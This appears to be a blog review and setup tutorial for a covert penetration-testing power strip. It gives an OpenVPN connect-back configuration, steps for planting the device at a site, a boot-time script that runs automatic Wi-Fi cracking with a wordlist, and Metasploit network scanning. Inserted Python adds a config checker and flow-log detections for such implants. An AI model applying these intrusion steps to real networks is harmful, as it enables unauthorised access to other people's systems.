Summary
Let's see if this silicon blade is sharp enough to cut through the security cheese!
Some intros: The Demyo Power Strip (DPS) is a covert penetration testing device built by Demyo Sec. While not the first of its kind, it is a strong competitor to existing tools such as the Power Pwn and the PlugBot. The DPS gives you the ability to launch attacks over ethernet, WiFi and Bluetooth.
Features
- Based on Raspberry Pi
- 700 MHz CPU (boostable to 1 GHz), 512 MB RAM, 32 GB SD
- Ethernet (10/100), WiFi b/g/n and Bluetooth connectivity
- Runs Debian Linux
- CLI (via SSH) and GUI (via VNC)
- Physical dimensions 14″ x 2.25″ x 8.25″ or 35.56cm x 5.72cm x 20.96cm
- Actually functions as a real power strip
Default Installed Tools
Some of the relevant packages installed:
- Nmap
- OpenVPN
- w3af
- aircrack-ng
- btscanner
- ophcrack
- John the Ripper password cracker
- and many more...
Getting Ready
Connecting for the First Time
Installing Your Preferred Tools
Installing your preferred toolset can be as easy as 1-2-3 thanks to the Debian flavor of Linux running on the DPS. Just run apt-get install for your favorite tool.
Installing the Metasploit Framework
To set up Metasploit you should run the following commands:
- wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
- tar -xjvf framework-latest.tar.bz2 (the archive is bzip2-compressed)
- apt-get update
- apt-get dist-upgrade (can take a bit)
- apt-get install postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 postgresql-doc-9.1 postgresql-server-dev-9.1
- gem install pg
Setting up an OpenVPN Server
For the DPS to connect back, I chose the OpenVPN route. You can easily set up an OpenVPN server on Amazon EC2 as described here (I used Ubuntu as a server).
The server setup:
port 1194
proto tcp-server
dev tun1
ifconfig 10.4.0.1 10.4.0.2
status server-tcp.log
verb 3
secret ovpn.key
daemon
Setting up OpenVPN on the DPS
Now that we have a server to connect back to, let's set up the DPS to connect to this server automatically.
The DPS OpenVPN client configuration:
dev tun
proto tcp-client
remote <INSERT IP OR HOSTNAME>
port 1194
ifconfig 10.4.0.2 10.4.0.1
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10
To set up auto-connect on boot, simply run "service openvpn start" after adding the key and configuration files.
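Static-key OpenVPN pairs like the two configs above fail silently when one side is edited and the other is not (a swapped ifconfig pair, a proto that no longer matches, a missing keepalive). As an added check that is not part of the original post and not OpenVPN's own tooling, the Python below parses both configs and verifies that they agree with each other. The hostname vpn.example.invalid stands in for the <INSERT IP OR HOSTNAME> placeholder; everything else is copied from the configs shown here.

```python
"""Consistency check for an OpenVPN static-key server/client config pair.
Added example; the two configs are the ones from the post, with a
placeholder hostname substituted for the remote."""
from typing import Dict, List

SERVER_CONF = """\
port 1194
proto tcp-server
dev tun1
ifconfig 10.4.0.1 10.4.0.2
status server-tcp.log
verb 3
secret ovpn.key
daemon
"""

CLIENT_CONF = """\
dev tun
proto tcp-client
remote vpn.example.invalid
port 1194
ifconfig 10.4.0.2 10.4.0.1
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10
"""

# Which client proto each server proto expects on the other end.
PROTO_PEER = {"tcp-server": "tcp-client", "udp": "udp"}


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each OpenVPN directive to its argument list; '#' and ';' start comments."""
    conf: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        key, *args = line.split()
        conf[key] = args
    return conf


def check_pair(server: Dict[str, List[str]], client: Dict[str, List[str]]) -> List[str]:
    """Return a list of mismatches; an empty list means the pair is consistent."""
    problems = []
    sproto = server.get("proto", ["udp"])[0]
    cproto = client.get("proto", ["udp"])[0]
    if PROTO_PEER.get(sproto) != cproto:
        problems.append(f"proto mismatch: server {sproto}, client {cproto}")
    if server.get("port", ["1194"]) != client.get("port", ["1194"]):
        problems.append("port mismatch")
    # ifconfig takes <local> <remote>; each side's local must be the other's remote.
    sif, cif = server.get("ifconfig"), client.get("ifconfig")
    if not sif or not cif:
        problems.append("ifconfig missing on one side")
    elif sif != list(reversed(cif)):
        problems.append(f"ifconfig not mirrored: server {sif}, client {cif}")
    # Static-key mode has to be enabled on both ends or the handshake never completes.
    if ("secret" in server) != ("secret" in client):
        problems.append("secret (static key) configured on one side only")
    if "remote" not in client:
        problems.append("client has no remote")
    if "keepalive" not in client:
        problems.append("client has no keepalive; a dropped TCP session will not reconnect")
    return problems


if __name__ == "__main__":
    issues = check_pair(parse_conf(SERVER_CONF), parse_conf(CLIENT_CONF))
    print("OK" if not issues else "\n".join(issues))
```

Run it against any edited pair before copying the files onto the device; the ifconfig and proto checks catch the two mistakes that are hardest to see in the OpenVPN log because the client simply keeps retrying.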
Sneaking In
Now all you need to do is walk into the location of interest, plug in the DPS and wait for it to connect back to your OpenVPN server. For the DPS to connect back, you will either need to connect a network cable or let it find an available WiFi access point (AP). If there are no open WiFi APs, we can set up the DPS to brute force the PSK via aircrack-ng. You'll have to take a lengthy break in this scenario because it may be a while before the cracking succeeds.
w00t w00t! Seeing the DPS Connect
You can run netstat to find the established connection or look at /var/log/syslog to follow the OpenVPN logs. Due to our simple OpenVPN setup, the DPS will be at 10.4.0.2. Now we can SSH into it and go to town!
Automating WEP/WPA/WPS cracking with Wifite and Reaver
Installing the tools:
- wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py && chmod +x wifite.py
- wget http://static.hackersgarage.com/darkc0de.lst.gz && gunzip darkc0de.lst.gz
- sudo apt-get install sqlite3 libsqlite3-dev gcc-4.7
- svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
- cd reaver-wps-read-only && ./configure && make && make install
Wifite comes with Reaver/WPS integration so all you have to do is run Wifite as:
- ./wifite.py -all
This will make Wifite perform all three types of attacks (WEP/WPA/WPS).
You can also configure Wifite to start on boot as a service by doing the following:
- nano /etc/init.d/wcracker
- Add the following code (save it as /etc/init.d/wcracker and make it executable):

#!/bin/sh
### BEGIN INIT INFO
# Provides:          wcracker
# Required-Start:    $local_fs $network $remote_fs $syslog
# Required-Stop:     $local_fs $network $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# X-Interactive:     true
# Short-Description: Start/stop Wcracker Service
### END INIT INFO

export USER='root'
eval cd ~$USER

case "$1" in
  start)
    # Start the wifi cracker in the background so the init script returns
    su $USER -c '/root/wifite.py -all -dict /root/darkc0de.lst' &
    echo "Starting wireless cracking for $USER"
    ;;
  stop)
    # Match on the full command line: the process name is the interpreter, not wifite.py
    pkill -f wifite.py
    echo "wireless cracking stopped"
    ;;
  *)
    echo "Usage: /etc/init.d/wcracker {start|stop}"
    exit 1
    ;;
esac
exit 0

- update-rc.d wcracker defaults
- And reboot
Some Snooping Around with Metasploit
Create a database (e.g. msf) in your Postgres installation, then launch Metasploit to connect to it and populate the database and module cache.
cd msf3
./msfconsole
msf > db_connect postgres:password@localhost/msf
You can scan the environment for potential targets using modules, such as auxiliary/scanner/smb/smb_version or build a database of targets with nmap and launch attacks.
msf > db_nmap -v -sV 192.168.1.0/24
The command above builds a database of the scanned network that can be used later on.
To get more in depth information about how to use Metasploit you can visit the Offensive Security web site.
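The connect-back described under "Sneaking In" and the db_nmap sweep above each leave a distinctive footprint on the network the device is plugged into, which is what a blue team would look for. As an added example that is not part of the original post, the Python below runs two detections over constructed flow records (the 203.0.113.x and 198.51.100.x addresses, hosts and timestamps are made up for the illustration): a long-lived outbound TCP/1194 session from an internal host to an external one, matching the server configuration used here, and one internal host opening connections to many distinct host:port pairs inside the /24 within a short window.

```python
"""Two flow-log detections for the footprint a planted device leaves behind:
a long-lived outbound OpenVPN session on TCP/1194 and scan fan-out on the LAN.
Added example; the flow records below are constructed, not captured traffic."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample records: ts,src,dst,proto,dport,duration(seconds).
# 192.168.1.57 plays the planted device, 192.168.1.20 a normal workstation.
SAMPLE_FLOWS = """\
1700000000,192.168.1.57,203.0.113.10,tcp,1194,3600
1700000000,192.168.1.20,198.51.100.7,tcp,443,40
1700000002,192.168.1.20,203.0.113.9,tcp,1194,20
1700000010,192.168.1.57,192.168.1.10,tcp,22,1
1700000011,192.168.1.57,192.168.1.10,tcp,445,1
1700000012,192.168.1.57,192.168.1.11,tcp,22,1
1700000013,192.168.1.57,192.168.1.11,tcp,445,1
1700000014,192.168.1.57,192.168.1.12,tcp,22,1
1700000015,192.168.1.57,192.168.1.12,tcp,445,1
1700000016,192.168.1.57,192.168.1.13,tcp,22,1
1700000017,192.168.1.57,192.168.1.13,tcp,445,1
1700000018,192.168.1.57,192.168.1.14,tcp,22,1
1700000019,192.168.1.57,192.168.1.14,tcp,445,1
1700000020,192.168.1.20,192.168.1.1,tcp,53,1
1700000021,192.168.1.20,192.168.1.30,tcp,445,2
"""


@dataclass(frozen=True)
class Flow:
    ts: int        # flow start, epoch seconds
    src: str
    dst: str
    proto: str
    dport: int
    duration: int  # seconds the connection stayed open


RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(addr: str) -> bool:
    """True for RFC 1918 addresses; everything else counts as external."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def parse_flows(text: str) -> List[Flow]:
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, proto, dport, dur = line.split(",")
        flows.append(Flow(int(ts), src, dst, proto.lower(), int(dport), int(dur)))
    return flows


def find_vpn_callbacks(flows: List[Flow], min_duration: int = 300) -> List[Tuple[str, str]]:
    """Internal hosts holding an outbound TCP/1194 session to an external address
    for at least min_duration seconds; the client's keepalive keeps such a
    session open indefinitely, which is what separates it from a brief probe."""
    hits = set()
    for f in flows:
        if (f.proto == "tcp" and f.dport == 1194 and is_internal(f.src)
                and not is_internal(f.dst) and f.duration >= min_duration):
            hits.add((f.src, f.dst))
    return sorted(hits)


def find_scanners(flows: List[Flow], window: int = 60, min_targets: int = 8) -> Dict[str, int]:
    """Internal sources touching at least min_targets distinct internal host:port
    pairs within any window of `window` seconds; returns the peak count per source."""
    by_src = defaultdict(list)
    for f in flows:
        if is_internal(f.src) and is_internal(f.dst) and f.src != f.dst:
            by_src[f.src].append(f)
    scanners: Dict[str, int] = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        start = 0
        for end in range(len(fl)):          # sliding window over flow start times
            while fl[end].ts - fl[start].ts > window:
                start += 1
            targets = {(f.dst, f.dport) for f in fl[start:end + 1]}
            if len(targets) >= min_targets:
                scanners[src] = max(scanners.get(src, 0), len(targets))
    return scanners


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for src, dst in find_vpn_callbacks(flows):
        print(f"possible VPN callback: {src} -> {dst}:1194")
    for src, n in find_scanners(flows).items():
        print(f"scan fan-out: {src} touched {n} host:port pairs")
```

The duration threshold matters: the workstation's short TCP/1194 attempt is ignored while the device's hour-long session is flagged. In a real deployment the port list would be widened (OpenVPN is only the choice made in this post) and the scan threshold tuned to the size of the subnet.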
Conclusion
Overall, the DPS appears to be a decent covert platform for performing penetration tests. It doesn't look as suspicious as other similar devices do, especially with an ethernet cable sticking out. The OS is flexible enough to rapidly install or compile non-default tools. It would be great if it had a 3G modem, and I heard from Demyo Sec that one will be present in the next release.
Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!
You can get more information from Demyo Sec's web site.
Disclaimer
The material and actions described here are for educational purposes only.